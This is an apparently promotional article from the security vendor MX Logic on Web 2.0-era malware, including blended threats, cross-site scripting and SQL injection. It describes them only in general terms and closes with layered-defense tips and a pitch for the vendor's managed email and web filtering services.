Defending Against the New Breed of Malware

Sam Masiello, Director of MX Logic’s Threat Operation Center, was recently asked a rather unusual theoretical question. What would happen today if a company completely turned off all of its Internet and email security?

Sam pondered the question for a few short minutes, then said, “Total annihilation.” He explained how the infection and destruction would take place. First, he explained, the network would be instantly flooded by armies of botnets. Network systems, databases and mail servers would slow to a crawl, and in some cases stop functioning all together as intruder malware consumed all the computing power. Employee desktops and laptops would be hit next, causing many of them to become virtually useless as viruses and botnets also consumed their processing power. Soon the entire computing infrastructure would be rendered inoperable by anyone inside or outside the company. Sam finished, “I’m guessing it would all take about two or maybe three minutes, tops.”

The Internet Evolves and Explodes

After the infamous bubble burst of the late 90’s and early 2000’s, the Internet entered a renaissance period of sorts. During this exciting time, the Internet went from serving up static web pages with read-only content to dishing up rich, dynamic content that users could actually interact with, change, edit and even create themselves.

The idea around community-published content meant that creating and publishing information was no longer limited to a select group. Instead, virtually anyone with an Internet connection and something to share could share it – and share it with the entire planet. Soon, blogs were springing up left and right. If you didn’t have your own blog, you probably knew someone who did.

Once people had the ability to share their ideas with the world, informal communities of people began organizing around these blogs. Some communities consisted of just a few people sharing ideas and information, while others grew into large, sophisticated communities made up of thousands of members. Sites like Classmates.com and LinkedIn emerged early, but soon gave way to broader, mainstream social networking sites like MySpace and FaceBook. Wikipedia took blogging to a new level by allowing multiple people to create, publish and edit content as a collective group.

The shift from static web pages to dynamic, community-based content forever changed how people viewed and used the Internet. However, with these exciting new technologies and changes came new security concerns and a whole new generation of sophisticated and dangerous online risks for users and companies.

Threat 2.0

Because content on Web 2.0 sites is user-provided, the content can contain almost anything. In an un-moderated blog, a post can contain links to malware downloads (directly or through infected pages) or offensive material. Videos posted to sites like YouTube can be virus infected, as can shared images on Flikr. As the Web has become more and more interactive, allowing anyone to post content, the risks have increased as well.

The maturation of "Web 2.0" applications and services, with more software functionality pushed onto client systems and browsers, introduced a new and more complex breed of security vulnerabilities. At the same time, many part-time hackers turned into professional hackers, driven by the growing black market demand for personal and company confidential information.

As a result, today’s Internet is plagued with many different types and forms of what security experts call “malware”. Malware comes in a variety of types, including viruses, worms, Trojans, spyware, adware, rootkits – the list goes on. Each is classified based on what they do and how they propagate themselves around the Internet.

Many of these threats have been around for a long time. Viruses were first introduced in 1983 and worms in 1988. More directly Web-related threats have cropped up recently. Cross-Site Scripting (XSS) and SQL Injections are two of the more prevalent, inserting malicious code into Web sites or databases. RSS or Atom news feeds, often fed by blogs and other Web 2.0 content, can also contain malware or XSS code. Shared or posted pictures and videos can contain Trojans or viruses in a threat known as Backdoor Media Files.

Let’s examine some of the new threats.

Blended Threats

As the name implies, blended threats combine several methods of attack. For example, a single blended virus can contain key logging technology, which is used to steal passwords and account information while simultaneously turning your system into a spam zombie in a botnet. Blended threats mark a significant threat escalation because they give cyber criminals several revenue-generating paths.

Cross-Site Scripting (XSS)

Cross-site scripting exploits are methods to inject code into a Web application, either through a form field or through a URL key-value pair set. Most attacks invoke JavaScript or other executable code into a web server to either extract login data from or to gain unauthorized access to the application in question. Once the access is gained the site can often be hijacked, malware can be inserted for download by unsuspecting users and a legitimate site becomes a source of infection.

SQL Injections

SQL injections are related to XSS attacks, but instead of inserting executable code into the Web application, the attacker inserts SQL code to query the backend database. If an attacker inserts a query string into a vulnerable login page, they can potentially extract a set of valid user names and passwords.

How Malware Spreads

Almost every interaction a computer has with the outside world can be an entry point for malware. Media like CDs, external drives, or peripherals can be infected. During the 2007 Christmas season, digital frames were found to contain a factory-infected virus. Email has long been a mechanism for sending infected files. More recent email attacks have used links to infected sites, allowing them to bypass virus scanning. The Internet is an even bigger threat. The ability to access sites of all types without knowing who provided the content means that legitimate looking sites can provide unwanted negative consequences.

Web 2.0 expands that set of threats. As more and more sites allow community interaction, the ability for malicious-minded individuals to insert malware or links into blogs, wikis, social networking sites, and other forums means that all of these applications are potential sources of infection. If users subscribe to these sites via RSS, Atom or other news feeds, the propagation of these infections can be very fast indeed.

While publishers or hosts of Web 2.0 sites should provide a best effort at protecting the user community, it is imperative that users protect themselves as well.

Detecting and Combatting Malware

Most malware infections are detected by the users themselves, who observe some type of unexpected computer behavior. Some symptoms of an infected machine are slow performance, excessive disk activity on an idle machine, and frequent unexpected pop-up dialog boxes. Another telltale symptom is the inability to run or update anti-virus software. From a network level, excessive bandwidth usage, odd port access, and off-hour utilization can be indicators of infected PCs as well.

Malware has become more sophisticated, but security technology has also advanced greatly in recent years. Using the right security technologies and following industry best practices can all but eliminate malware as an issue. Following are some expert tips about what you can do to protect yourself and your company.

• Implement security in layers . Using anti-spam, anti-virus and anti-spyware solutions in the network, at your gateway, and beyond the perimeter (in the cloud) in addition to on individual desktop computers will provide much greater overall protection.
• Implement a firewall . A network firewall may be able to prevent many infections by blocking them before they enter the network. Additionally, firewalls can block unwanted outbound traffic, such as outbound messages sent from existing botnets.
• Use strong passwords . While annoying to implement, experts all agree that using multiple passwords for different applications and changing them frequently is one of the best preventative measures you can take. Also, institute strong password policies. A strong password should be at least 8 characters long and should contain a combination of upper and lowercase letters, numbers, and one or more special characters like exclamation points.
• Keep software up-to-date . Install software patches so attackers can’t exploit known problems or vulnerabilities. Enable automatic updates in operating system and anti-malware applications. A virus engine is only as good as its signature set.
• Never download blindly from people or sites that you do not know or cannot trust. Ensure that the website you are visiting is the actual site by typing URLs directly into a Browser instead of clicking links from emails. Ensure that all downloaded files are scanned by antivirus software either prior to download or on the desktop.
• Don’t get lulled into a false sense of security just because you have anti-virus software. In many cases, the anti-virus software cannot accurately detect viruses and Trojans, especially emerging threats. Additionally, software-running desktops can’t detect malware until it is actually in the operating system of the PC.
• Be Cautious . If the file comes from a “friend”, make sure you know what the file contains before opening. As discussed, an infected machine will attempt to propagate to other “friends”.
• Follow good security practices . Take appropriate precautions when using email and web browsers to reduce the risk that your actions will trigger an infection.

Fighting Bad Technology with Good Layered Technology

There are many ways to protect personal or corporate information and infrastructure from Internet threats. Desktop and server software, network appliances and managed services all provide different levels of protection. As mentioned above, a layered approach is ultimately best. Since computer-related security threats are growing in sophistication and always changing, having multiple checks increases the probability that one layer will detect a threat before it reaches its intended destination.

One of the simplest and most cost effective ways of adding multiple layers of protection is to insert a managed security service into your security mix. Unlike hardware or software, a managed security service sits outside the corporate infrastructure, providing a buffer between the Internet and the network. Managed services, like those provided by MX Logic, are also monitored 24x7x365 and are updated frequently to handle the latest Internet threats.

Although the services are often bundled together, there are two standard types of managed services that most companies consider – email defense and web defense. An email defense service filters messages before they ever reach the corporate infrastructure. Since up to 80 percent of all email messages are spam or contain some form of malware, stopping these messages before they reach the network not only prevents malware infiltration, but also frees up valuable bandwidth.

Like email defense, a web defense service prevents malware from being transferred from malicious websites to the corporate infrastructure by providing a buffer that sits outside the network. A service like the MX Logic Web Defense service provides both malware protection and content control services. With the service, users are prevented from knowingly or unknowingly accessing phishing or spyware websites. All files accessed through the Internet are also filtered before ever reaching the network. Finally, machines that are already infected are prevented from sending out information, and reports are generated letting administrators know which computers are infected by botnets or malware.

Using a managed security service is an excellent and affordable way to provide additional layers of protection and is ideal for both small and large organizations.

Surf on Safely

Email, the Internet and other online tools are an integral part of modern business. Many of the Web 2.0 innovations have made the Internet a much richer and useful tool for everyone. Still, the Internet poses great risks and complex security threats that need to be acknowledged and addressed. Recognizing the threats and cleaning up the effects are steps in solving the problems, but proactive approaches such as implementing a layered approach are much more effective. More layers of security provide a better ability to find and stop Internet threats before they infect a machine, expose sensitive information or consume valuable resources. As the saying goes, an ounce of protection is almost always worth more than a pound of cure.